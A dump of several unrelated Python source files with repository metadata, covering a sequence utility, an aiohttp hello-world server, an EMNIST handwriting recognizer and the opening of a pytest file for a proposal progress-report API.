fout.write('\nSubsequence: ' + k + '\n')
fout.write('Positions: ' + v.get('positions', '') + '\n')
fout.write('Set of complementary sequences: ' + v.get('set', '') + '\n')
for item in v.get('items', list()):
fout.write('Complementary: ' + item.get('complementary', '') + '\n')
fout.write('Locations: ' + item.get('locations', '') + '\n')
if __name__ == '__main__':
args = vars(ComplSeqUtils.get_args())
ComplSeqUtils.find_complementary_sequences(args.get('num_chars', 0), args.get('input_file', None),
args.get('seq_type', 'rna'), args.get('output_file', None))
| mmferrari/ComplSeqUtils | compl_seq_utils.py | compl_seq_utils.py | py | 6,687 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 81,
"usage_type": "call"
}
] |
12388878470 | # asyncio实现了tcp udp ssl等协议,aiohttp是基于asyncio实现的http框架
import asyncio
from aiohttp import web
# 编写一个http服务器处理以下url
# / - 首页返回 b'<h1>Index</h1>';
# /hello/{name} - 根据 URL 参数返回文本 hello, %s!。
async def index(request):
await asyncio.sleep(0.5)
return web.Response(body=b'<h1>index</h1>')
async def hello(request):
await asyncio.sleep(0.5)
text = '<h1>hello,%s!</h1>' % request.match_info['name']
return web.Response(body=text.encode('utf-8'))
async def init(loop):
app = web.Application(loop=loop)
app.router.add_route('GET', '/', index)
app.router.add_route('GET', '/hello/{name}', hello)
# 创建tcp服务
srv = await loop.create_server(app.make_handler(), '127.0.0.1', 8000)
print('server started at http://localhost:8000...')
return srv
loop = asyncio.get_event_loop()
loop.run_until_complete(init(loop))
loop.run_forever()
| chikchikL/pythonLearning | aiohttp_demo.py | aiohttp_demo.py | py | 969 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "asyncio.sleep",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "aiohttp.web.Response",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "aiohttp.web",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "asyncio.sleep",
"l... |
38467207386 | import cv2
import numpy as np
import keras
emnist_labels = [48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122]
def letters_extract(image_file: str, out_size=28):
img = cv2.imread(image_file)
gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
ret, thresh = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY)
img_erode = cv2.erode(thresh, np.ones((3, 3), np.uint8), iterations=1)
contours, hierarchy = cv2.findContours(img_erode, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
output = img.copy()
letters = []
for idx, contour in enumerate(contours):
(x, y, w, h) = cv2.boundingRect(contour)
if hierarchy[0][idx][3] == 0:
cv2.rectangle(output, (x, y), (x + w, y + h), (70, 0, 0), 1)
letter_crop = gray[y:y + h, x:x + w]
size_max = max(w, h)
letter_square = 255 * np.ones(shape=[size_max, size_max], dtype=np.uint8)
if w > h:
y_pos = size_max//2 - h//2
letter_square[y_pos:y_pos + h, 0:w] = letter_crop
elif w < h:
x_pos = size_max//2 - w//2
letter_square[0:h, x_pos:x_pos + w] = letter_crop
else:
letter_square = letter_crop
letters.append((x, w, cv2.resize(letter_square, (out_size, out_size), interpolation=cv2.INTER_AREA)))
letters.sort(key=lambda x: x[0], reverse=False)
return letters
def emnist_predict_img(model, img):
img_arr = np.expand_dims(img, axis=0)
img_arr = 1 - img_arr/255.0
img_arr[0] = np.rot90(img_arr[0], 3)
img_arr[0] = np.fliplr(img_arr[0])
img_arr = img_arr.reshape((1, 28, 28, 1))
predict_x=model.predict([img_arr])
result=np.argmax(predict_x,axis=1)
return chr(emnist_labels[result[0]])
def img_to_str(model, image_file: str):
letters = letters_extract(image_file)
s_out = ""
for i in range(len(letters)):
dn = letters[i+1][0] - letters[i][0] - letters[i][1] if i < len(letters) - 1 else 0
s_out += emnist_predict_img(model, letters[i][2])
if (dn > letters[i][1]/4):
s_out += ' '
return s_out
image_file = (r'D:\gzip\gzip\3.png')
model = keras.models.load_model('D:\gzip\gzip\Demnist_letters1.h5')
s_out = img_to_str(model, image_file)
print(s_out) | Xaosgod/image-text-recognition | Распознование текста дополнительно/main.py | main.py | py | 2,500 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "cv2.imread",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "cv2.cvtColor",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "cv2.COLOR_RGB2GRAY",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "cv2.threshold",
"... |
29326716419 | from bs4 import BeautifulSoup
import requests
from csv import writer
url = "https://www.linkedin.com/jobs/search?keywords=backend&location=India&geoId=102713980&trk=public_jobs_jobs-search-bar_search-submit&position=1&pageNum=0"
page = requests.get(url)
soup = BeautifulSoup(page.content,'html.parser')
lists = soup.find_all('section', class_="two-pane-serp-page__results-list")
with open('scraping.csv', 'w',encoding='utf8',newline="") as f:
thewriter = writer(f)
header = ['info','title','subtitle','titlelink','metadata','location','time']
thewriter.writerow(header)
for list in lists:
titleui = list.find("ul",class_="jobs-search__results-list ")
info = list.find('div',class_="base-search-card__info").text.replace("\n","")
title= list.find('h3',class_="base-search-card__title").text.replace("\n","")
subtitle=list.find('h4', class_="base-search-card__subtitle").text.replace("\n","")
titlelink = list.find('a',class_="hidden-nested-link").text.replace("\n","")
metadata = list.find('div', class_="base-search-card__metadata").text.replace("\n","")
location=list.find('span', class_="job-search-card__location").text.replace("\n","")
time = list.find('span',class_="job-search-card__listdate")
if time is not None:
time = time.text.replace("\n","")
else:
time ="unknown"
main = [info,title,subtitle,titlelink,metadata,location,time]
print(main)
thewriter.writerow(main)
f.flush()
| entrepreneur123/web-scrapping | scrap.py | scrap.py | py | 1,542 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "requests.get",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "csv.writer",
"line_number": 14,
"usage_type": "call"
}
] |
4048633000 | import traceback
from types import MethodType
#
# class MyClass(object):
# pass
#
# def set_name(self,name):
# self.name=name
#
# cls = MyClass()
# cls.name="kevin"
# print(cls.name)
#
# cls.set_name = MethodType(set_name,cls)
# cls.set_name("lara")
# print(cls.name)
#第二部分:可以看到上面的类可以被随便添加方法和属性,那么怎么实现只能添加指定的属性和方法?用魔术__slot__
class MyClass2(object):
__slots__ = ['name1','set_name1']
def set_name(self,name):
self.name=name
# cls = MyClass2()
# cls.name="kevin"
# print(cls.name)
#
# try:
# cls.set_name = MethodType(set_name,cls) #报错 AttributeError
# except AttributeError:
# traceback.print_exc()
#第三部分,如果继承了第二部分的类,那么slots就不起作用
class ExtMyClass(MyClass2):
pass
# ext_cls = ExtMyClass()
# ext_cls.age=20
#
# print(ext_cls.age)
#第四部分:使用@property实现get 和 set方法
class Student:
@property
def score(self):
return self._score
@score.setter
def score(self,value):
if not isinstance(value,int):
raise ValueError("not int")
elif (value<0) or (value>100):
raise ValueError("not between 0 and 100")
self._score = value
#只读属性,就是不要设置setter 就行
@property
def double_socre(self):
return self._score*2
# s = Student()
# s.score=100
# print(s.score) # 100
# print(s.double_socre) # 200
#第五部分:用描述器模拟生成property功能(不想学,下次再说)
#第六部分 类的默认行为与定制
class defaultAction:
def __init__(self,name):
self.name = name
def __str__(self):
return "hello "+self.name
# t = defaultAction("bitch") #如果没有__str__重写,就是标准的输出 否则就是自定义的hello bitch
# print(t)
#把类做成迭代器实现 斐波拉契
class Fib100:
def __init__(self):
self._1,self._2 = 0,1
def __iter__(self):
return self
def __next__(self):
self._1,self._2 =self._2,self._2+self._1
if self._1 > 100:
raise StopIteration
return self._1
# for i in Fib100():
# print(i)
# 实现下标访问 需要重写__getitem__选项
class Fib2:
def __getitem__(self, n):
a,b = 1,1
for i in range(n):
a,b = b, a+b
return a
# f = Fib2()
# # print(f[1])
# # print(f[5])
# # print(f[10])
#第七部分 枚举
from enum import Enum
Month = Enum("Month",('Jan','Feb','Mar','Apr'))
# print(Month) #<enum 'Month'>
# print(Month.__members__.items()) ('Jan','Feb','Mar','Apr')
# for name , member in Month.__members__.items():
# print(name,"=>",member,',',member.value)
# print(Month.Jan) # Month.Jan
#第八部分 元类 元编程
def init(self,name):
self.name = name
def say_hello(self):
print('Hello! %s!' % self.name)
Hello = type('Hello',(object,),dict(__init__ = init,hello=say_hello)) #这里等同于创建了一个类,然后有初始化方法 和 hello方法
# h = Hello("name")
# h.hello() #Hello! name!
#第九部分 元类(控制类的创建)
class ListMetaClass(type): #元类一定要继承自type
def __new__(cls,name,bases,attrs):
# print(cls)
# print(name)
# print(bases)
# print(type(attrs))
attrs['add'] = lambda self,value: self.append(value)
return type.__new__(cls,name,bases,attrs)
#新建一个类指定继承自list,然后指定元类是ListMetaClass, 在上面元类中
#通过__new__新建一个一个add方法,方法体通过lambda方式实现了
class MyList(list,metaclass=ListMetaClass):
pass
# mli = MyList()
# mli.add(1)
# mli.add(2)
# mli.add(3)
# print(mli)
#第十部分 ORM框架实例实现
#背景:假如我们要自己写model,怎么保证save方法能获取到继承类User的id,name,然后保存呢?
# class User(Model): #都是伪代码
# id = IntegerField('id')
# name = StringField('name')
#
# u = User()
# u.id =100
# u.name = 'tome'
# u.save()
#用元类解决上面的问题
class Field:
def __init__(self, name, col_type):
self.name = name
self.col_type = col_type
class IntegerField(Field):
def __init__(self, name):
super(IntegerField, self).__init__(name, 'integer')
class StringField(Field):
def __init__(self, name):
super(StringField, self).__init__(name, 'varchar(1024)')
class ModelMetaclass(type):
def __new__(cls, name, bases, attrs):
if name == 'Model':
return type.__new__(cls, name, bases, attrs)
print('Model name: %s' % name)
mappings = {}
for k, v in attrs.items():
if isinstance(v, Field):
print('Field name: %s' % k)
mappings[k] = v
for k in mappings.keys():
attrs.pop(k)
attrs['__mappings__'] = mappings
attrs['__table__'] = name
return type.__new__(cls, name, bases, attrs)
class Model(dict, metaclass = ModelMetaclass):
def __init__(self, **kvs):
super(Model, self).__init__(**kvs)
def __getattr__(self, key):
try:
return self[key]
except KeyError:
raise AttributeError("'Model' object has no attribute '%s'." % key)
def __setattr__(self, key, value):
print('__setattr__')
self[key] = value
def save(self):
fields = []
params = []
args = []
for k, v in self.__mappings__.items():
fields.append(v.name)
params.append('?')
args.append(getattr(self, k, None))
sql = 'insert into %s(%s) values(%s)' % (self.__table__, ','.join(fields), ','.join(params))
print('sql:', sql)
print('args:', args)
class User(Model):
id = IntegerField('id')
name = StringField('name')
# u = User(id = 100, name = 'Tom')
# u = User()
# u.id = 100
# u.name = 'Tom'
# u.save()
#第十一部分:测试
import unittest
class MyDict(dict):
pass
class TestMyDict(unittest.TestCase):
def setUp(self):
print("测试前")
def tearDown(self):
print("测试后清理")
def test_init(self):
md = MyDict(one = 1,two=2)
self.assertEqual(md['one'],1)
self.assertEqual(md['two'],2)
# if __name__ == '__main__':
# unittest.main()
#第十一部分:日志
import logging
logging.basicConfig(filename="test.log", filemode="w", format="%(asctime)s %(name)s:%(levelname)s:%(message)s", datefmt="%d-%M-%Y %H:%M:%S", level=logging.DEBUG)
logging.debug('This is a debug message')
logging.info('This is an info message')
logging.warning('This is a warning message')
logging.error('This is an error message')
logging.critical('This is a critical message') | zkc360717118/PYTHON-python-study | 7.1 slot和property.py | 7.1 slot和property.py | py | 6,827 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "enum.Enum",
"line_number": 113,
"usage_type": "call"
},
{
"api_name": "unittest.TestCase",
"line_number": 239,
"usage_type": "attribute"
},
{
"api_name": "logging.basicConfig",
"line_number": 256,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG... |
1306455244 | import argparse
import glob
import os
import numpy as np
import tensorflow as tf
from tqdm import tqdm
from params import logmel_predictions_root, emb_root, saved_models_root
os.environ["CUDA_VISIBLE_DEVICES"] = "1"
os.environ['TF_FORCE_GPU_ALLOW_GROWTH'] = 'true'
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
def main():
# Arguments parser
parser = argparse.ArgumentParser(description='Extract Log-mel spectrograms predictions.')
parser.add_argument('--set_name', type=str, help='Dataset name', default='lj_speech')
parser.add_argument('--model_name', type=str, help='Model name', default='VGGish')
parser.add_argument('--loss_type',type=str,help='Loss used for training',default='l1_adv')
parser.add_argument('--layer', type=str, help='Layer for feature extraction', default='pool1')
parser.add_argument('--n_songs', type=int, help='Number of songs', default=100)
parser.add_argument('--override', action='store_true', help='Overwrite existing audio')
args = parser.parse_args()
set_name = args.set_name
model_name = args.model_name
loss_type = args.loss_type
layer = args.layer
n_songs = args.n_songs
override = args.override
# Folders
logmel_predictions_dir = os.path.join(logmel_predictions_root, set_name,model_name + '_' + layer, loss_type)
emb_dir = os.path.join(emb_root, set_name, model_name + '_' + layer)
# Output folders
if not os.path.isdir(logmel_predictions_dir):
os.makedirs(logmel_predictions_dir)
# Generate embedding list
embedding_path_list = glob.glob(os.path.join(emb_dir, '*.npy'))
# Select number of audio
if n_songs > 0:
embedding_path_list = embedding_path_list[0:n_songs]
# Load tf model
logmel_predictions_generator = tf.keras.models.load_model(
os.path.join(saved_models_root,model_name+'_'+layer,loss_type,))
# Loop over audio
for embedding_path in tqdm(embedding_path_list):
# Output path
logmel_id = os.path.basename(embedding_path).split('.')[0]
logmel_prediction_path = os.path.join(logmel_predictions_dir, '{:s}.npy'.format(logmel_id))
if not os.path.isfile(logmel_prediction_path) or override:
try:
embedding_chunked = np.load(embedding_path)
logmel_prediction_chunked = logmel_predictions_generator.predict(embedding_chunked)
# Generate log-mel spectogram prediction using selected model
if len(logmel_prediction_chunked) != 0:
np.save(logmel_prediction_path, logmel_prediction_chunked)
except:
print('Cannot process file {:s}'.format(logmel_id))
if __name__ == '__main__':
os.nice(2)
main()
| polimi-ispl/speech_reconstruction_embeddings | dataset/logmel_predictions.py | logmel_predictions.py | py | 2,750 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "os.environ",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "os.environ",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "os.environ",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "argparse.ArgumentPars... |
27368861795 | import numpy
from sympy import symbols, exp, sqrt, diff, N, solve, integrate
def function(x):
return numpy.exp(-numpy.sqrt(x))
def function_symbolic():
return exp(-sqrt(symbols('x')))
# noinspection SpellCheckingInspection
def m_n_plus_one(n, a, b, func):
x = symbols('x')
extremums = solve(diff(func, x, n + 2))
maximum = 0
maximum = max(maximum, abs(N(diff(func, x, n + 1).subs(x, a))))
maximum = max(maximum, abs(N(diff(func, x, n + 1).subs(x, b))))
for number in extremums:
maximum = max(maximum, abs(N(diff(func, x, n + 1).subs(x, number))))
return float(maximum)
def define_step(a, b, eps):
h = numpy.sqrt(12 * eps / (m_n_plus_one(1, a, b, function_symbolic()) * (b - a)))
n = numpy.ceil((b - a) / h)
n_remainder = n % 4
if n_remainder != 0:
n += 4 - n_remainder
return (b - a) / n
def trapezes_integrate(a, b, h):
n = numpy.ceil((b - a) / h)
integral = 0
i = 1
while i <= n:
integral += (h / 2) * (function(a + (i - 1) * h) + function(a + i * h))
i += 1
return integral
def simpson_integrate(a, b, h):
n = numpy.ceil((b - a) / h)
integral = 0
i = 1
while i <= n:
integral += (h / 6) * (function(a + (i - 1) * h) + 4 * function(a + (i - 1 / 2) * h) + function(a + i * h))
i += 1
return integral
def newton_leibniz_integrate(a, b):
return integrate(function_symbolic(), (symbols('x'), a, b))
| Miralius/LabsNumericalMethods | Lab3/functions.py | functions.py | py | 1,459 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "numpy.exp",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "numpy.sqrt",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "sympy.exp",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "sympy.sqrt",
"line_number": 10,
... |
22110756450 | """ Posts Models """
#Django
from users.models import Profile
from django.contrib.auth.models import User
from django.db import models
class Post(models.Model):
user=models.ForeignKey(User,on_delete=models.CASCADE)
profile=models.ForeignKey('users.Profile',on_delete=models.CASCADE)
title= models.CharField(max_length=255)
photo=models.ImageField(upload_to='post/photos')
created=models.DateField(auto_now_add=True)
modified=models.DateField(auto_now=True)
def __str__(self):
return '{} by @{}'.format(self.title,self.user.username)
| jjestrada2/jjestrada2.github.io | platziGram/juanjoGraming/posts/models.py | models.py | py | 576 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "django.db.models.Model",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "django.db.models",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "django.db.models.ForeignKey",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": ... |
33318878173 | import rpyc
import sys
server = "localhost"
if len(sys.argv) > 1:
if int(sys.argv[1]) > 0:
try:
conn = rpyc.connect(server, 18811)
if conn.root:
conn.root.initialize_connections(int(sys.argv[1]))
while True:
try:
remote_command = input("Input the Command:\t").lower().split(" ")
conn.root.handle_remote_command(remote_command)
if remote_command[0] == "exit":
sys.exit(0)
except KeyboardInterrupt:
print("\nKeyboardInterrupt detected. Disconnecting from server.")
conn.close()
break
except EOFError:
print("Connection Terminated.")
finally:
print("Exiting.")
else:
print("No of connections cannot be less than 1.")
sys.exit(0)
else:
print("Usage: 'driver_service.py <number_of_connections>'")
sys.exit(0) | bodias/ds2022-mini-proj-1 | ra_program_client.py | ra_program_client.py | py | 793 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sys.argv",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "rpyc.connect",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 1... |
6884041126 | from torch import nn
import torch.nn.functional as f
class LSTM(nn.Module):
def __init__(self, in_channels, hidden_dim, n_layer, n_classes):
super(LSTM, self).__init__()
self.n_layer = n_layer
self.latent_dim = 32
self.hidden_dim = hidden_dim
self.map = nn.Linear(in_channels, self.latent_dim)
self.lstm = nn.LSTM(self.latent_dim, hidden_dim, n_layer, batch_first=True)
self.fc = nn.Linear(hidden_dim, n_classes)
def forward(self, x):
x = self.map(x)
out, (h_n, c_n) = self.lstm(x)
x = h_n[-1, :, :]
y = self.fc(x)
y = f.softmax(y)
return y
| Huasheng-hou/deep-fin | src/model/LSTM.py | LSTM.py | py | 657 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "torch.nn.Module",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "torch.nn.Linear",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_numb... |
2333300703 | from openpyxl import Workbook
arquivo_excel = Workbook()
planilha1 = arquivo_excel.active
planilha1.title = "Relatorios"
planilha2 = arquivo_excel.create_sheet("Ganhos")
planilha1['A1'] = 'Categoria'
planilha1['B1'] = 'Valor'
planilha1['A2'] = "Restaurante"
planilha1['B2'] = 45.99
planilha2.cell(row=3, column=1, value=2000)
planilha2.cell(row=1, column=1, value="VALOR")
arquivo_excel.save("relatorio.xlsx") | DeMouraSS/dados-detran | planilha.py | planilha.py | py | 409 | python | pt | code | 0 | github-code | 1 | [
{
"api_name": "openpyxl.Workbook",
"line_number": 2,
"usage_type": "call"
}
] |
25474598848 |
"""
Picomon executable module.
This module can be executed from a command line with ``$python -m picomon`` or
from a python programme with ``picomon.__main__.run()``.
"""
import concurrent.futures
import signal
import argparse
import logging
import traceback
import sys
import os
from time import sleep
from datetime import datetime, timedelta
from . import config
from . import mails
def __create_report(only_old=False):
has_error = False
report = ''
report += "\n Checks in error:\n"
now = datetime.now()
delta = timedelta(seconds=config.emails.report.every)
for check in config.checks:
if not check.ok and (not only_old or now - check.failure_date > delta):
has_error = True
report += '-+' * 40 + '\n'
report += "%s: %s\nSince %s\n\t%s\n" % (check.target_name, check,
check.failure_date, check.errmsg.strip())
report += '-+' * 40 + "\n\n"
report += " Other checks (usually OK but may be in retry mode):\n"
for check in config.checks:
if check.ok:
report += "Check %s is %s\n" % (check,
"OK" if check.retry_count == 0 else "retrying")
return (report, has_error)
def __usr1_handler(signum, frame):
(report, err) = __create_report()
print ("Signal SIGUSR1 caught, printing state of checks. (%s)" %
datetime.now())
print (report)
sys.stdout.flush()
def __alarm_handler(signum, frame):
(report, err) = __create_report(only_old=True)
if err:
report = "Following entries have failed for more than %ss:\n" % \
config.emails.report.every + report
mails.send_email_report(report)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-1", "--one",
help="single run with immediate output of " +
"check results (test/debug)",
action="store_true")
parser.add_argument("-D", "--debug",
help="Set verbosity to DEBUG",
action="store_true")
parser.add_argument("-c", "--config",
help="Set config file (defauts to config.py)",
default='config.py')
return parser.parse_args()
def import_config(configfile):
""" import config file module """
# narrow importlib usage and avoid bytecode writing to be able to use
# configfiles in RO directories
from importlib import import_module
sys.dont_write_bytecode = True
sys.path.append(os.path.dirname(configfile))
filename = os.path.basename(configfile)
base, ext = os.path.splitext(filename)
try:
import_module(base)
except ImportError as e:
logging.critical("Cannot load config from '%s': %s" % (
configfile, str(e)))
sys.exit(1)
def run():
# Parse command line
args = parse_args()
# import config file module
import_config(args.config)
# Configure logging
logging.basicConfig(format='%(asctime)s %(levelname)s: %(message)s',
level=config.verb_level)
if args.debug:
logging.getLogger().setLevel('DEBUG')
# register signal handling
signal.signal(signal.SIGUSR1, __usr1_handler)
signal.signal(signal.SIGALRM, __alarm_handler)
# register report signal interval
if config.emails.report.every > 0:
signal.setitimer(signal.ITIMER_REAL, config.emails.report.every,
config.emails.report.every)
# do the actual polling
with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
if args.one:
def runner(check):
return check.run(immediate=True), check
futures = []
for check in config.checks:
futures.append(executor.submit(runner, check))
for future in concurrent.futures.as_completed(futures):
success, check = future.result()
if success:
print("Check %s successful!" % (str(check)))
else:
print("Check %s failed:\n%s" %
(str(check), check.errmsg.strip()))
else:
# Since we never reclaim finished tasks, exceptions raised during
# run are never seen. Using a runner we can at least display them.
def runner(check):
try:
return check.run()
except Exception as e:
traceback.print_exc()
raise e
# This will drift slowly as it takes (base_tick + espilon) seconds
while True:
for check in config.checks:
executor.submit(runner, check)
sleep(config.base_tick)
mails.quit()
if __name__ == '__main__':
run()
| StrasWeb/picomon | picomon/__main__.py | __main__.py | py | 4,947 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "datetime.datetime.now",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 28,
"usage_type": "name"
},
{
"api_name": "datetime.timedelta",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "datetime.d... |
2774942212 | from __future__ import absolute_import
import os
from celery import Celery
from django.conf import settings
# set the default Django settings module for the 'celery' program.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "applifting.settings")
app = Celery("applifting")
# Using a string here means the worker will not have to
# pickle the object when using Windows.
app.config_from_object("django.conf:settings")
app.autodiscover_tasks(lambda: settings.INSTALLED_APPS)
@app.on_after_finalize.connect
def setup_periodic_tasks(sender, **kwargs):
sender.add_periodic_task(
60.0,
snapshot_offer_pricestamps.s(),
name="get_offer_pricestamps_for_all_products",
)
@app.task(bind=True)
def debug_task(self):
print(f"Request: {self.request!r}")
@app.task
def snapshot_offer_pricestamps():
from catalog.tasks import get_offer_pricestamps_for_all_products
return get_offer_pricestamps_for_all_products()
| ondrej-ivanko/applifting | applifting/celery.py | celery.py | py | 949 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "os.environ.setdefault",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "celery.Celery",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "django.conf.settings... |
41654548036 | import numpy as np
import keras
import pandas as pd
from sklearn.model_selection import train_test_split
np.random.seed(123)
import tensorflow as tf
tf.set_random_seed(123)
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Flatten
from keras.layers import Convolution2D, MaxPooling2D
from keras.utils import np_utils
from keras.datasets import mnist
batch_size = 128
df = pd.read_csv("train.csv")
y = df.label.values
X = df.drop("label", axis=1).values
X_train, X_test, Y_train, Y_test = train_test_split(X, y, test_size=0.2)
X_train = np.array(X_train)
Y_train = np.array(Y_train)
X_test = np.array(X_test)
Y_test = np.array(Y_test)
X_train = X_train.reshape(X_train.shape[0], 28, 28, 1).astype('float32')
X_test = X_test.reshape(X_test.shape[0], 28, 28, 1).astype('float32')
X_train /= 255
X_test /= 255
Y_train = np_utils.to_categorical(Y_train, 10)
Y_test = np_utils.to_categorical(Y_test, 10)
model = Sequential()
model.add(Convolution2D(32, (6, 6), activation="relu", input_shape=(28, 28, 1)))
model.add(Convolution2D(64, (6, 6), activation="relu"))
model.add(MaxPooling2D(pool_size=(3, 3)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.4))
model.add(Dense(10, activation="softmax"))
model.compile(loss="categorical_crossentropy",
optimizer="adam",
metrics=['accuracy'])
model.fit(X_train, Y_train, batch_size=batch_size, epochs=5, verbose=1, validation_data=(X_test, Y_test))
model.save('model_new.h5')
score = model.evaluate(X_test, Y_test, verbose=0)
print("Test loss: {} ".format(score[0]))
print("Test accuracy: {}".format(score[1]))
test_data = pd.read_csv("test.csv")
import matplotlib.pyplot as plt
ans = []
for i in range(len(test_data.as_matrix())):
img = test_data.as_matrix()[i]
img = img / 255
img = np.array(img).reshape((28, 28, 1))
img = np.expand_dims(img, axis=0)
img_class = model.predict_classes(img)
ans.append(img_class)
ids = [i+1 for i in range(len(ans))]
df_1 = pd.DataFrame({"ImageId" : ids, "Label" : ans})
df_1.to_csv("1.csv", index = False)
#print(classes[0:10])
print(img_class)
#prediction = img_class[0]
classname = img_class[0]
print("Predicted number is: ",classname)
img = img.reshape((28,28))
plt.imshow(img)
plt.title(classname)
plt.show()
| wasi-9274/DL_Directory | DL_Projects/mnist_advanced.py | mnist_advanced.py | py | 2,351 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "numpy.random.seed",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.set_random_seed",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "pandas.re... |
2710936445 | import os
import shlex
import subprocess
import datetime
import time
import shutil
from setuptools import setup, Extension
cwd = os.path.dirname(os.path.abspath(__file__))
def execute_command(cmdstring, cwd=None, timeout=None, shell=False):
if shell:
cmdstring_list = cmdstring
else:
cmdstring_list = shlex.split(cmdstring)
if timeout:
end_time = datetime.datetime.now() + datetime.timedelta(seconds=timeout)
sub = subprocess.Popen(cmdstring_list, cwd=cwd, stdin=subprocess.PIPE,shell=shell,bufsize=4096)
while sub.poll() is None:
time.sleep(0.1)
if timeout:
if end_time <= datetime.datetime.now():
raise Exception("Timeout: %s"%cmdstring)
return sub.returncode
def build_library():
config_command = "cmake -S {} -B {}"
path_to_source = cwd
path_to_build = os.path.join(cwd, "build")
if os.path.exists(path_to_build):
shutil.rmtree(path_to_build)
config_command = config_command.format(path_to_source, path_to_build)
code = execute_command(config_command)
if code != 0:
raise RuntimeError("Run configure command fail.")
build_command = "cmake --build {}".format(os.path.join(cwd, "build"))
code = execute_command(build_command)
if code != 0:
raise RuntimeError("Run build Command fail.")
def main():
build_library()
extention = Extension(
"opqr",
libraries=["opqr"],
sources=["stub.cpp"],
language="c++",
extra_compile_args=['-std=c++17'],
include_dirs=[cwd],
library_dirs=[os.path.join(cwd, "build")]
)
setup(name="opqr",
version="1.1.3",
long_description="A Simple QR encode Library.",
description="A Simple QR encode Library.",
author="caozhanhao",
author_email="cao2013zh@163.com",
ext_modules=[extention]
)
if __name__ == "__main__":
main()
| caozhanhao/opqr-python | setup.py | setup.py | py | 1,983 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "os.path.dirname",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "os.path.abspath",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "shlex.split",
"line_num... |
24879538563 | import pathlib
from typing import Any, Callable, NamedTuple
import pytest
from fastapi.testclient import TestClient
from starlette import status
from tests.conftest import authenticate, find_username
PROGRESS_REPORT_URL = "/progress"
def _prepare_settings_and_summary(
proposal_code: str, tmp_path: pathlib.Path, monkeypatch: pytest.MonkeyPatch
) -> None:
class MockSettings(NamedTuple):
proposals_dir: pathlib.Path
def mock_get_settings() -> Any:
return MockSettings(pathlib.Path(tmp_path))
monkeypatch.setattr(
"saltapi.service.proposal_service.get_settings", mock_get_settings
)
proposal_dir = mock_get_settings().proposals_dir / proposal_code
included_dir = proposal_dir / "Included"
# The included directory must exist as the generated progress report is stored in
# that directory.
included_dir.mkdir(parents=True)
submission_version_dir = proposal_dir / "1"
submission_version_dir.mkdir(parents=True)
summary_pdf: pathlib.Path = submission_version_dir / "Summary.pdf"
fake_summary_pdf = pathlib.Path.cwd() / "tests" / "data" / "summary.pdf"
summary_pdf.write_bytes(fake_summary_pdf.read_bytes())
def test_submitting_progress_report_is_impossible_with_invalid_percentages(
client: TestClient,
) -> None:
proposal_code = "2018-2-SCI-020"
data = {
"requested_time": 4200,
"maximum_seeing": 2,
"transparency": "Thin cloud",
